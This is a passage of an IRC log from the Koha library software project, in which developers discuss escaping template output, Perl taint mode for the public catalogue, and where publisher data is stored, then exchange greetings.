09:12 | |Lupin| | ok |
09:12 | chris | you need to escape output |
09:12 | |Lupin| | so do you have a protection against this ? |
09:12 | chris | like |
09:12 | |Lupin| | ah yes that was this part of what you were saying |
09:12 | chris | if you are using HTML::Template like Koha does |
09:13 | ESCAPE="HTML" | |
09:13 | so <TMPL_VAR NAME="something" ESCAPE="HTML"> | |
09:13 | |Lupin| | ah ok I see |
09:14 | chris | certainly do that for the search string, cos we output that without checking it |
09:14 | |Lupin| | you mean when creating new templates ? |
09:19 | chris | yep, and we should check our existing ones it never hurts to check when you are editing a template |
09:19 | 'is everything that should be escaped here, escaped?' | |
09:21 | |Lupin| | I see |
09:21 | very nice security lesson chris, thanks | |
09:23 | chris | one of the sysadmins at work spent a lot of time doing security work |
09:23 | |Lupin| | yes ? |
09:23 | sounds wise | |
09:24 | chris | he is going to do an audit on koha for us |
09:24 | |Lupin| | chris: do koha scripts run in tainted mode as perlsec suggests ? |
09:24 | oh wow | |
09:24 | chris | nope |
09:24 | |Lupin| | sounds great and interesting |
09:25 | chris: is it the result of a design decision, or just that none took the time to do the modification so far ? | |
09:26 | chris | well it wouldnt make sense for the intranet, but we should probably run the opac with taint on |
09:27 | |Lupin| | chris: why do you say it wouldn't make sesne for the intranet ? because you make the hypothesis that someone with a password is trustworthy, right ? |
09:28 | chris | partly, also because we dont do anything that taint would protect us from |
09:29 | like opening files etc | |
09:29 | the dbi placeholders protect the db | |
09:30 | if we were to do system calls, or writing to files, or things like that, we should definitely run that script with taint | |
09:30 | |Lupin| | chris: I see. tainted seems to be more for inmut like files, environment variables, etc. |
09:30 | chris | *nod* |
09:31 | |Lupin| | chris: but in theopac you don't do such things either, do you ? |
09:32 | chris | yep but if one crept into there it would be much worse than the intranet, so having a rule that the opac runs under taint would make it hard for us to accidentally sneak an untainted system call in |
09:33 | |Lupin| | chris: ok |
09:33 | chris | (we might one day allow users to upload their own patron images for example) |
09:34 | or an icon to show with their reviews | |
09:36 | |Lupin| | ah and that would make the opac tainted, definitely |
09:36 | (if the right measures are't taken, I mean) | |
09:36 | chris | *nod* |
09:46 | davi | In what Koha table is the publisher or editorial kept? It is not in biblio. |
09:46 | hdl_laptop | biblioitems |
09:49 | davi | thank hdl_laptop Confirmed |
11:31 | Amit | hi jwanger |
11:31 | jwagner | Hi Amit |
11:49 | hdl_laptop | hi. any Ller around ? |
11:50 | |Lupin| | Ller ? |
11:51 | paul_p | |Lupin|: LibLimer |
11:51 | |Lupin| | quite cryptic ! :) |
11:51 | hi paul_p and thanks | |
11:51 | paul_p | (and we are BL (BibLibre) or BibLibrarian |
11:54 | |Lupin| | paul_p: right |
← Previous day | Today | Next day → | Search | Index